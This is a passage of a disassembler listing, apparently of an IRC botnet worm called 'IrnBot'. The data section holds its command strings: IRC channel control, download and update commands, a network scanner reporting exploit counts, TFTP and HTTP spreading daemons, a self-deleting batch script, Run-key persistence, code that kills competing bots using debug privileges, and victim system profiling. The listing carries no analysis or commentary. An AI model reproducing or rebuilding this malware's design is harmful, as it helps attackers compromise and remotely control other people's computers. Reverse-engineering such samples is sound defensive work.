aRm db 'RM',0 ; DATA XREF: sub_41C2E2+33Do
align 4
aBk db 'BK',0 ; DATA XREF: sub_41C2E2+376o
align 10h
aUnm db 'UNM',0 ; DATA XREF: sub_41C2E2+39Bo
aBadAllocati_12 db 'bad allocation',0 ; DATA XREF: .data:004270A8o
align 4
aSS_7 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41881F+42o
a142_20__ db '142.20.*.*',0 ; DATA XREF: sub_418884+106o
align 4
aSorryAboutTheH db 'Sorry about the hospital computers :(',0
align 10h
aSS_8 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_418884+197o
aSS_9 db '%s-%s',0 ; DATA XREF: sub_418884+214o
align 10h
aSSSS00S db '%s %s',0Dh,0Ah ; DATA XREF: sub_418884+28Bo
db '%s %s 0 0 :%s',0Dh,0Ah,0
align 4
asc_420318 db 0Dh,0Ah,0 ; DATA XREF: sub_4186F1+7Eo
align 4
aS_10 db '%s',0 ; DATA XREF: sub_4186F1+B6o
align 10h
asc_420320 db 0Dh,0Ah,0 ; DATA XREF: sub_4186F1+CBo
align 4
aSSS_1 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_417B51+C2o
align 10h
aS_12 db '%s',0 ; DATA XREF: sub_41802D+4Ao
align 4
asc_420334 db ' :',0 ; DATA XREF: sub_41802D+7Eo
align 4
aS_13 db '%s',0 ; DATA XREF: sub_41802D+8Ao
align 4
asc_42033C: ; DATA XREF: sub_41802D+E1o
unicode 0, < >,0
aS_14 db '%s',0 ; DATA XREF: sub_41802D+FAo
align 4
asc_420344: ; DATA XREF: sub_41802D+124o
unicode 0, < >,0
aSS_10 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41802D+24Ao
aSSS_2 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_41802D+31Eo
align 4
a001 db '001',0 ; DATA XREF: sub_41802D+33Ao
aSSSSSS db '%s %s %s',0Dh,0Ah ; DATA XREF: sub_41802D+3D3o
db '%s %s %s',0Dh,0Ah,0
align 4
a332 db '332',0 ; DATA XREF: sub_41802D+417o
asc_42037C db ' :',0 ; DATA XREF: sub_41802D+499o
align 10h
aS_0 db '%s',0 ; DATA XREF: sub_41802D+4A5o
align 4
asc_420384: ; DATA XREF: sub_41802D+4D9o
unicode 0, <!>,0
aS_1 db '%s',0 ; DATA XREF: sub_41802D+4E5o
align 4
a332_0 db '332',0 ; DATA XREF: sub_41802D+52Do
aS_2 db '%s',0 ; DATA XREF: sub_41802D+546o
align 4
aS_3 db '%s',0 ; DATA XREF: sub_41802D+5B1o
align 4
aS_4 db '%s',0 ; DATA XREF: sub_41802D+5DFo
align 4
asc_42039C: ; DATA XREF: sub_41802D+64Eo
unicode 0, <;>,0
asc_4203A0: ; DATA XREF: sub_41802D:loc_418682o
unicode 0, <;>,0
asc_4203A4: ; DATA XREF: sub_41802D:loc_41868Fo
unicode 0, <;>,0
asc_4203A8: ; DATA XREF: sub_417E66+Co
unicode 0, < >,0
aS_8 db '-s',0 ; DATA XREF: sub_417E66+27o
align 10h
aS_9 db '/s',0 ; DATA XREF: sub_417E66+3Fo
align 4
asc_4203B4: ; DATA XREF: sub_417E66:loc_417EBAo
unicode 0, < >,0
aQwertyuiopasdf db 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM',0
; DATA XREF: sub_417C7B+21o
align 10h
asc_4203F0: ; DATA XREF: sub_417C7B+5Eo
unicode 0, <[>,0
aSS db '%s%s|',0 ; DATA XREF: sub_417C7B+95o
align 4
aSS_0 db '%s%s|',0 ; DATA XREF: sub_417C7B+C5o
align 4
aSp db '%sP|',0 ; DATA XREF: sub_417C7B+F0o
align 4
aS0I64u db '%s0%I64u|',0 ; DATA XREF: sub_417C7B+12Fo
align 4
aSI64u db '%s%I64u|',0 ; DATA XREF: sub_417C7B+150o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_417C7B+18Fo
align 4
aS db '%s]',0 ; DATA XREF: sub_417C7B+1BAo
aBadAllocati_13 db 'bad allocation',0 ; DATA XREF: .data:004270ACo
align 10h
aHs db 'HS',0 ; DATA XREF: sub_419545+28o
align 4
aIrnbot db 'IrnBot',0 ; DATA XREF: sub_41946E+89o
align 4
aSS_1 db '%s\%s',0 ; DATA XREF: sub_41934D+4Eo
align 4
aGet db 'GET',0 ; DATA XREF: sub_418D80+B7o
aQue? db 'Que?',0 ; DATA XREF: sub_418D80+C7o
align 10h
aHttp1_1501NotI db 'HTTP/1.1 501 Not Implemented',0Dh,0Ah ; DATA XREF: sub_418D80+10Fo
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
aSSSS db '%s\%s\%s%s',0 ; DATA XREF: sub_418D80+229o
align 4
aSSS db '%s\%s\%s',0 ; DATA XREF: sub_418D80+1F2o
align 10h
aSS_4 db '%s\%s',0 ; DATA XREF: sub_418D80+25Ao
align 4
aQue?_0 db 'Que?',0 ; DATA XREF: sub_418D80+3A8o
align 10h
aQue?_1 db 'Que?',0 ; DATA XREF: sub_418D80+2BEo
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 ok',0Dh,0Ah ; DATA XREF: sub_418D80+3FCo
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttpTransferD_ db 'HTTP: Transfer: %d.%d.%d.%d (N/A). %d Total Sends.',0
; DATA XREF: sub_418D80+51Do
align 4
aHttpTransfer_0 db 'HTTP: Transfer: %d.%d.%d.%d (%s). %d Total Sends.',0
; DATA XREF: sub_418D80+54Ao
align 4
asc_42057C db 0Dh,0Ah,0 ; DATA XREF: sub_418CED+11o
align 10h
asc_420580: ; DATA XREF: sub_418CED:loc_418D19o
unicode 0, < >,0
asc_420584: ; DATA XREF: sub_418CED+3Do
unicode 0, < >,0
asc_420588: ; DATA XREF: sub_418CED+54o
unicode 0, < >,0
asc_42058C db 0Dh,0Ah ; DATA XREF: sub_418CED+78o
db 0Dh,0Ah,0
align 4
asc_420594 db '%x',0 ; DATA XREF: sub_418BC4+CAo
align 4
aBadAllocati_14 db 'bad allocation',0
align 4
aS_15 db '%s',0 ; DATA XREF: sub_41BDFF+74o
align 4
aSX db '%s%X',0 ; DATA XREF: sub_41BDFF+ECo
align 4
aBadAllocati_15 db 'bad allocation',0
align 4
a@echoOff1DelSI db '@echo off',0Dh,0Ah ; DATA XREF: sub_4198F3+7Eo
db ':1',0Dh,0Ah
db 'del "%s"',0Dh,0Ah
db 'if exist "%s" goto 1',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 10h
aSTmpIIICCC_bat db '%s\tmp-%i%i%i-%c%c%c.bat',0 ; DATA XREF: sub_4198F3+FCo
align 4
aW: ; DATA XREF: sub_4198F3+110o
unicode 0, <w>,0
aS_6 db '%s',0 ; DATA XREF: sub_4198F3+12Bo
align 4
aRegistryMonito db 'Registry Monitor',0 ; DATA XREF: sub_419CB0+D9o
align 4
aSoftwareMicr_3 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419CB0+12Ao
align 4
aQuitSYouKill_0 db 'QUIT :%s YOU KILLED ME :<',0Dh,0Ah,0
aQuitSYouKilled db 'QUIT :%s YOU KILLED ME :< --UPDATED',0Dh,0Ah,0
; DATA XREF: sub_419CB0+15Ao
align 4
aRemoveAuthenti db 'Remove: Authentication Failed.',0
align 4
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_4197F4+55o
aVis db 'VIS',0 ; DATA XREF: sub_41967F+42o
a2k3 db '2K3',0 ; DATA XREF: sub_41967F+55o
aXp_0 db 'XP',0 ; DATA XREF: sub_41967F+62o
align 4
a2k db '2K',0 ; DATA XREF: sub_41967F+6Eo
align 4
aMe db 'ME',0 ; DATA XREF: sub_41967F+81o
align 4
a98 db '98',0 ; DATA XREF: sub_41967F+8Eo
align 10h
aNt db 'NT',0 ; DATA XREF: sub_41967F+A0o
align 4
a95 db '95',0 ; DATA XREF: sub_41967F+ADo
align 4
aUnk db 'UNK',0 ; DATA XREF: sub_41967F:loc_419733o
aOsMicrosoftWin db '[OS: Microsoft Windows %s %s (%i.%i build %i)]',0
; DATA XREF: sub_41967F+108o
align 4
aS_5 db '%s',0 ; DATA XREF: sub_41967F+13Ao
align 10h
a192_168__ db '192.168.*.*',0 ; DATA XREF: sub_419B7D+35o
a10___ db '10.*.*.*',0 ; DATA XREF: sub_419B7D+49o
align 4
a111___ db '111.*.*.*',0 ; DATA XREF: sub_419B7D+5Do
align 4
a15___ db '15.*.*.*',0 ; DATA XREF: sub_419B7D+71o
align 10h
a16___ db '16.*.*.*',0 ; DATA XREF: sub_419B7D+85o
align 4
a101___ db '101.*.*.*',0 ; DATA XREF: sub_419B7D+99o
align 4
a110___ db '110.*.*.*',0 ; DATA XREF: sub_419B7D+A9o
align 4
a112___ db '112.*.*.*',0 ; DATA XREF: sub_419B7D+B9o
align 10h
a170_65__ db '170.65.*.*',0 ; DATA XREF: sub_419B7D+C9o
align 4
a172_D__ db '172.%d.*.*',0 ; DATA XREF: sub_419B7D+E3o
align 4
aBadAllocati_16 db 'bad allocation',0
align 4
aBadAllocati_17 db 'bad allocation',0
align 4
aMessageboxa_0 db 'MessageBoxA',0 ; DATA XREF: sub_419EB0+12o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_419EB0+17o
align 10h
dword_4207E0 dd 0D010Fh, 0C3000000h, 0 ; DATA XREF: sub_419E25+19o
dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
dd 69746163h, 6E6Fh
dword_42080C dd 63257325h, 0 ; DATA XREF: sub_419F0A+55o
dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh
dword_420824 dd 6C6E6977h, 6E6F676Fh, 6578652Eh, 0 ; DATA XREF: sub_41A6D9+3Co
dword_420834 dd 68637673h, 2E74736Fh, 657865h ; DATA XREF: sub_41A6D9+44o
dword_420840 dd 76726573h, 73656369h, 6578652Eh, 0 ; DATA XREF: sub_41A6D9+4Co
aOpenthread db 'OpenThread',0 ; DATA XREF: sub_41A6D9+5Fo
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+64o
align 4
aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_41A6D9+78o
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+7Do
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_41A6D9+8Co
align 4
aKernel32_dll_2 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+91o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_41A6D9+A0o
align 4
aKernel32_dll_3 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+A5o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_41A6D9+B4o
align 4
aKernel32_dll_4 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+B9o
align 4
aModule32first db 'Module32First',0 ; DATA XREF: sub_41A6D9+C8o
align 4
aKernel32_dll_5 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+CDo
align 4
aModule32next db 'Module32Next',0 ; DATA XREF: sub_41A6D9+DCo
align 4
aKernel32_dll_6 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+E1o
align 4
aThread32first db 'Thread32First',0 ; DATA XREF: sub_41A6D9+F0o
align 4
aKernel32_dll_7 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+F5o
align 4
aThread32next db 'Thread32Next',0 ; DATA XREF: sub_41A6D9+104o
align 4
aKernel32_dll_8 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+109o
align 4
aReadprocessmem db 'ReadProcessMemory',0 ; DATA XREF: sub_41A6D9+118o
align 4
aKernel32_dll_9 db 'kernel32.dll',0 ; DATA XREF: sub_41A6D9+11Do
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_41A6D9+12Co
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_41A6D9+131o
align 4
aSS_2 db '%s\%s',0 ; DATA XREF: sub_41A6D9+1F5o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A6D9+2BEo
align 4
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A6D9+365o
align 4
aSystem db 'System',0 ; DATA XREF: sub_41A6D9+390o
align 4
aBotKilledS db 'Bot Killed: %s',0 ; DATA XREF: sub_41A6D9+451o
align 4
aSoftwareMicr_4 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_41A2D8+36o
align 4
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
; DATA XREF: sub_41A2D8+3Do
align 4
aSoftwareMicr_6 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
; DATA XREF: sub_41A2D8+44o
aSoftwareMicr_7 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: sub_41A2D8+4Bo
align 4
aSystemControls db 'SYSTEM\ControlSet001\Services\Eventlog\System',0
; DATA XREF: sub_41A4A6+26o
align 4
aSS_5 db '%s\%s',0 ; DATA XREF: sub_41A4A6+E4o
align 4
aLdm db 'LDM',0 ; DATA XREF: sub_41A4A6+118o
aNetdde db 'NetDDE',0 ; DATA XREF: sub_41A4A6+12Bo
align 4
aEventmessagefi db 'EventMessageFile',0 ; DATA XREF: sub_41A4A6+142o
align 4
aBadAllocati_18 db 'bad allocation',0
align 4
aListTTooLong db 'list<T> too long',0 ; DATA XREF: sub_40121E+2Bo
; sub_4016BA+2Bo
align 10h
dd offset dword_421038
off_420B54 dd offset nullsub_25 ; DATA XREF: sub_41C283+23o
dword_420B58 dd 7325h ; DATA XREF: sub_40177B+EBo
; sub_4019F3+EBo ...
dword_420B5C dd 652Dh ; DATA XREF: sub_40177B+1D5o
dword_420B60 dd 31h ; DATA XREF: sub_40177B+1E7o
dword_420B64 dd 4C44h ; DATA XREF: sub_40177B+23Fo
; sub_4019F3+1F1o
aDlAuthFailure_ db 'DL: Auth Failure.',0 ; DATA XREF: sub_40177B:loc_4019C8o
align 4
aDlInvalidArgum db 'DL: Invalid Arguments',0 ; DATA XREF: sub_40177B:loc_4019D5o
align 4
aUpdAuthFailure db 'UPD: Auth Failure.',0 ; DATA XREF: sub_4019F3:loc_401BF2o
align 4
aUpdInvalidArgu db 'UPD: Invalid Arguments.',0 ; DATA XREF: sub_4019F3:loc_401BFFo
dd offset dword_4211E8
off_420BC4 dd offset sub_40177B ; DATA XREF: .text:0041CB75o
; .data:off_4357C8o
dd offset dword_42119C
off_420BCC dd offset sub_4019F3 ; DATA XREF: .text:0041CB91o
; .data:off_4357C4o
dword_420BD0 dd 25207325h, 73h ; DATA XREF: sub_401C1D+8Fo
dword_420BD8 dd 54495551h, 73253A20h, 0A0Dh ; DATA XREF: sub_401C1D+BFo
aQuitIrnPowered db 'QUIT :Irn Powered',0Dh,0Ah,0 ; DATA XREF: sub_401C1D:loc_401CF7o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401D0C+1Eo
align 4
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_401D0C+30o
align 4
aIInsufficientA db 'I: Insufficient Arguments.',0 ; DATA XREF: sub_401D0C:loc_401D4Ao
; sub_401D67:loc_401D8Ao
align 10h
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_401D67+14o
align 4
dd offset dword_4212CC
off_420C40 dd offset sub_401C1D ; DATA XREF: .text:0041CBADo
; .data:off_4357D4o
dd offset dword_421280
off_420C48 dd offset sub_401D0C ; DATA XREF: .text:0041CBC9o
; .data:off_4357CCo
dd offset dword_421234
off_420C50 dd offset sub_401D67 ; DATA XREF: .text:0041CBE5o
; .data:off_4357D0o
aHttpSDS db 'http://%s:%d/%s',0 ; DATA XREF: sub_401DA7+7Ao
dd offset dword_421318
off_420C68 dd offset sub_401DA7 ; DATA XREF: .text:0041CC01o
; .data:off_4357D8o
off_420C6C dd offset loc_44344F+4 ; DATA XREF: sub_401E4D+FAo
; sub_401E4D+142o ...
aS4AlreadyRunni db 'S4:Already Running',0 ; DATA XREF: sub_401E4D:loc_401F9Do
align 4
aS4ThreadStoppe db 'S4: Thread Stopped',0 ; DATA XREF: sub_401FDA+7Co
align 4
aS4NoThreadRunn db 'S4: No Thread Running',0 ; DATA XREF: sub_401FDA:loc_40205Do
align 10h
dd offset dword_4213B0
off_420CB4 dd offset sub_401E4D ; DATA XREF: .text:0041CC1Do
; .data:off_4357E0o
dd offset dword_421364
off_420CBC dd offset sub_401FDA ; DATA XREF: .text:0041CC39o
; .data:off_4357DCo
aSystemSCpuIXS@ db 'System: %s [CPU: %i x %s @ %dMhz] [RAM: %iMB/%iMB] [Country: %s] '
; DATA XREF: sub_40207D+188o
db '[IP: %s] [User: %s] [System Dir: %s] [Uptime: %I64ud %I64uh %I64u'
db 'm]',0
align 4
aNetIpSHostNA db 'Net: IP: %s Host: N/A',0 ; DATA XREF: sub_402242+58o
align 10h
aNetIpSHostS db 'Net: IP: %s Host: %s',0 ; DATA XREF: sub_402242+76o
align 4
dd offset dword_421448
off_420D7C dd offset sub_40207D ; DATA XREF: .text:0041CC55o
; .data:off_4357E4o
dd offset dword_4213FC
off_420D84 dd offset sub_402242 ; DATA XREF: .text:0041CC71o
; .data:off_4357E8o
aScanUnknownExp db 'Scan: Unknown Exploit.',0 ; DATA XREF: sub_4022DF:loc_4023C4o
align 10h
a____0 db '*.*.*.*',0 ; DATA XREF: sub_4022DF+107o
aA db '-a',0 ; DATA XREF: sub_4022DF+146o
align 4
aB db '-b',0 ; DATA XREF: sub_4022DF+155o
align 10h
aC db '-c',0 ; DATA XREF: sub_4022DF+164o
align 4
aScanNotEnoughT db 'Scan: Not Enough Threads. %d Available.',0 ; DATA XREF: sub_4022DF+1AEo
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4022DF+228o
; sub_4022DF+368o
aX_ db 'x.',0 ; DATA XREF: sub_4022DF+23Fo
align 4
aD_ db '%d.',0 ; DATA XREF: sub_4022DF+253o
aSx_ db '%sx.',0 ; DATA XREF: sub_4022DF+26Bo
align 4
aSD_ db '%s%d.',0 ; DATA XREF: sub_4022DF+266o
align 10h
aSx db '%sx',0 ; DATA XREF: sub_4022DF+2C8o
aSD db '%s%d',0 ; DATA XREF: sub_4022DF+2DDo
align 4
aD_x_x_x db '%d.x.x.x',0 ; DATA XREF: sub_4022DF+3C1o
align 4
aD_D_x_x db '%d.%d.x.x',0 ; DATA XREF: sub_4022DF+3AAo
align 4
aD_D_D_x db '%d.%d.%d.x',0 ; DATA XREF: sub_4022DF+390o
align 10h
aScanSDUsingDTh db 'Scan: %s:%d Using %d Threads.',0 ; DATA XREF: sub_4022DF+40Bo
align 10h
aScanner db 'Scanner',0 ; DATA XREF: sub_4022DF+4EBo
; sub_402800+42o
aScanAllScanThr db 'Scan: All Scan Threads Stopped. %d killed.',0
; DATA XREF: sub_402800+BFo
align 4
aStatisticsExpl db 'Statistics: Exploits:',0 ; DATA XREF: sub_4028E0+3Bo
align 4
aSSD db '%s %s: %d',0 ; DATA XREF: sub_4028E0+62o
align 4
aSDaemons db '%s; Daemons:',0 ; DATA XREF: sub_4028E0+84o
align 4
aSTftpD db '%s TFTP: %d',0 ; DATA XREF: sub_4028E0+9Ao
aSHttpD db '%s HTTP: %d',0 ; DATA XREF: sub_4028E0+B0o
dd offset dword_42152C
off_420ED4 dd offset sub_4022DF ; DATA XREF: .text:0041CC9Bo
; .data:off_4357F8o
dd offset dword_4214E0
off_420EDC dd offset sub_402800 ; DATA XREF: .text:0041CCB7o
; .data:off_4357F0o
dd offset dword_421494
off_420EE4 dd offset sub_4028E0 ; DATA XREF: .text:0041CCD3o
; .data:off_4357F4o
dbl_420EE8 dq 5.0e-1 ; DATA XREF: sub_41AFF3:loc_41B56Br
flt_420EF0 dd 4.2949673e9 ; DATA XREF: sub_41AFF3+572r
align 8
dd 48h, 0Eh dup(0)
dd offset dword_423064
dd offset dword_421580
dd 13h
dword_420F40 dd 3 dup(0) ; DATA XREF: fabskl8p:0041D344o
dd offset off_423008
dd offset dword_420F54
dword_420F54 dd 2 dup(0) ; DATA XREF: fabskl8p:00420F50o
dd 3, 420F64h, 420F74h, 421100h, 42114Ch, 0
dd offset off_423008
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F54h
dword_420F90 dd 3 dup(0) ; DATA XREF: fabskl8p:0041D378o
dd offset off_42744C
dd offset dword_421168
dword_420FA4 dd 3 dup(0) ; DATA XREF: fabskl8p:0041D398o
dd offset off_423030
dd offset dword_420FB8
dword_420FB8 dd 2 dup(0) ; DATA XREF: fabskl8p:00420FB4o
dd 1, 420FC8h, 420FD0h, 0
dd offset off_423030
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420FB8h
dword_420FEC dd 3 dup(0) ; DATA XREF: fabskl8p:0041DC30o
dd offset off_423E50
dd offset dword_421000
dword_421000 dd 2 dup(0) ; DATA XREF: fabskl8p:00420FFCo
dd 2, 421010h, 42101Ch, 42114Ch, 0
dd offset off_423E50
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421000h
dword_421038 dd 3 dup(0) ; DATA XREF: fabskl8p:00420B50o
dd offset off_4273F4
dd offset dword_42104C
dword_42104C dd 2 dup(0) ; DATA XREF: fabskl8p:00421048o
dd 1, 42105Ch, 421064h, 0
dd offset off_4273F4
align 10h
dd 0FFFFFFFFh, 0
dd 40h, 42104Ch
dword_421080 dd 3 dup(0) ; DATA XREF: fabskl8p:0041D338o
dd offset off_42740C
dd offset dword_421094
dword_421094 dd 2 dup(0) ; DATA XREF: fabskl8p:00421090o
dd 3, 4210A4h, 4210B4h, 421100h, 42114Ch, 0
dd offset off_42740C
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 421094h
dword_4210D0 dd 3 dup(0) ; DATA XREF: fabskl8p:0041D32Co
dd offset off_42742C
dd offset dword_4210E4
dword_4210E4 dd 2 dup(0) ; DATA XREF: fabskl8p:004210E0o
dd 2, 4210F4h, 421100h, 42114Ch, 0
dd offset off_42742C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4210E4h, 3 dup(0)
dd offset off_427468
dd offset dword_421130
dword_421130 dd 2 dup(0) ; DATA XREF: fabskl8p:0042112Co
dd 2, 421140h, 421180h, 42114Ch, 0
dd offset off_42744C
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 421168h
dword_421168 dd 2 dup(0) ; DATA XREF: fabskl8p:00420FA0o
dd 1, 421178h, 42114Ch, 0
dd offset off_427468
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421130h
dword_42119C dd 3 dup(0) ; DATA XREF: fabskl8p:00420BC8o
dd offset off_427484
dd offset dword_4211B0
dword_4211B0 dd 2 dup(0) ; DATA XREF: fabskl8p:004211ACo
dd 2, 4211C0h, 4211CCh, 421064h, 0
dd offset off_427484
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4211B0h
dword_4211E8 dd 3 dup(0) ; DATA XREF: fabskl8p:00420BC0o
dd offset off_42749C
dd offset dword_4211FC
dword_4211FC dd 2 dup(0) ; DATA XREF: fabskl8p:004211F8o
dd 2, 42120Ch, 421218h, 421064h, 0
dd offset off_42749C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4211FCh
dword_421234 dd 3 dup(0) ; DATA XREF: fabskl8p:00420C4Co
dd offset off_4274B0
dd offset dword_421248
dword_421248 dd 2 dup(0) ; DATA XREF: fabskl8p:00421244o
dd 2, 421258h, 421264h, 421064h, 0
dd offset off_4274B0
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421248h
dword_421280 dd 3 dup(0) ; DATA XREF: fabskl8p:00420C44o
dd offset off_4274C8
dd offset dword_421294
dword_421294 dd 2 dup(0) ; DATA XREF: fabskl8p:00421290o
dd 2, 4212A4h, 4212B0h, 421064h, 0
dd offset off_4274C8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421294h
dword_4212CC dd 3 dup(0) ; DATA XREF: fabskl8p:00420C3Co
dd offset off_4274E0
dd offset dword_4212E0
dword_4212E0 dd 2 dup(0) ; DATA XREF: fabskl8p:004212DCo
dd 2, 4212F0h, 4212FCh, 421064h, 0
dd offset off_4274E0
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4212E0h
dword_421318 dd 3 dup(0) ; DATA XREF: fabskl8p:00420C64o
dd offset off_4274F8
dd offset dword_42132C
dword_42132C dd 2 dup(0) ; DATA XREF: fabskl8p:00421328o
dd 2, 42133Ch, 421348h, 421064h, 0
dd offset off_4274F8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 42132Ch
dword_421364 dd 3 dup(0) ; DATA XREF: fabskl8p:00420CB8o
dd offset off_427514
dd offset dword_421378
dword_421378 dd 2 dup(0) ; DATA XREF: fabskl8p:00421374o
dd 2, 421388h, 421394h, 421064h, 0
dd offset off_427514
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421378h
dword_4213B0 dd 3 dup(0) ; DATA XREF: fabskl8p:00420CB0o
dd offset off_42752C
dd offset dword_4213C4
dword_4213C4 dd 2 dup(0) ; DATA XREF: fabskl8p:004213C0o
dd 2, 4213D4h, 4213E0h, 421064h, 0
dd offset off_42752C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4213C4h
dword_4213FC dd 3 dup(0) ; DATA XREF: fabskl8p:00420D80o
dd offset off_427540
dd offset dword_421410
dword_421410 dd 2 dup(0) ; DATA XREF: fabskl8p:0042140Co
dd 2, 421420h, 42142Ch, 421064h, 0
dd offset off_427540
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421410h
dword_421448 dd 3 dup(0) ; DATA XREF: fabskl8p:00420D78o
dd offset off_42755C
dd offset dword_42145C
dword_42145C dd 2 dup(0) ; DATA XREF: fabskl8p:00421458o
dd 2, 42146Ch, 421478h, 421064h, 0
dd offset off_42755C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 42145Ch
dword_421494 dd 3 dup(0) ; DATA XREF: fabskl8p:00420EE0o
dd offset off_427578
dd offset dword_4214A8
dword_4214A8 dd 2 dup(0) ; DATA XREF: fabskl8p:004214A4o
dd 2, 4214B8h, 4214C4h, 421064h, 0
dd offset off_427578
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4214A8h
dword_4214E0 dd 3 dup(0) ; DATA XREF: fabskl8p:00420ED8o
dd offset off_427594
dd offset dword_4214F4
dword_4214F4 dd 2 dup(0) ; DATA XREF: fabskl8p:004214F0o
dd 2, 421504h, 421510h, 421064h, 0
dd offset off_427594
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4214F4h
dword_42152C dd 3 dup(0) ; DATA XREF: fabskl8p:00420ED0o
dd offset off_4275B0
dd offset dword_421540
dword_421540 dd 2 dup(0) ; DATA XREF: fabskl8p:0042153Co
dd 2, 421550h, 42155Ch, 421064h, 0
dd offset off_4275B0
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421540h, 2 dup(0)
dword_421580 dd 4674h, 4779h, 69F0h, 8A08h, 0EF18h, 1C8E3h, 1C8FEh
; DATA XREF: fabskl8p:00420F38o
dd 1C919h, 1C93Ch, 1C95Fh, 1C984h, 1C9A9h, 1C9D1h, 1CA0Ch
dd 1CA3Ch, 1CA61h, 1CA93h, 1CACEh, 1CB03h, 0
dword_4215D0 dd 2 dup(0) ; DATA XREF: sub_40B3F1+2o
; sub_40B3F1+7o
dword_4215D8 dd 2 dup(0) ; DATA XREF: sub_40B415+2o
; sub_40B415+7o
dword_4215E0 dd 0 ; DATA XREF: sub_402A85+29o
dd offset sub_402A19
dd 0
dd offset dword_42161C
dd 0FFFFFFFFh, 41C8DBh
dword_4215F8 dd 19930522h, 1, 4215F0h, 5 dup(0) ; DATA XREF: .text:0041C8F4o
dd 1
dword_42161C dd 3, 42162Ch, 421C80h, 421C9Ch, 0 ; DATA XREF: fabskl8p:004215ECo
dd offset off_423008
align 8
dd 0FFFFFFFFh, 0
dd 28h, 402AC4h
dword_421648 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_402E11+2o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402EA3
align 8
dword_421668 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4031B1+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4031E7
align 8
dword_421688 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4034FC+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4035B6
align 8
dword_4216A8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4035D3+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403718
align 8
dword_4216C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_403890+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403901
align 8
dword_4216E8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4039CF+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403A25
align 8
dword_421708 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_403A5D+2o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403AA3
align 8
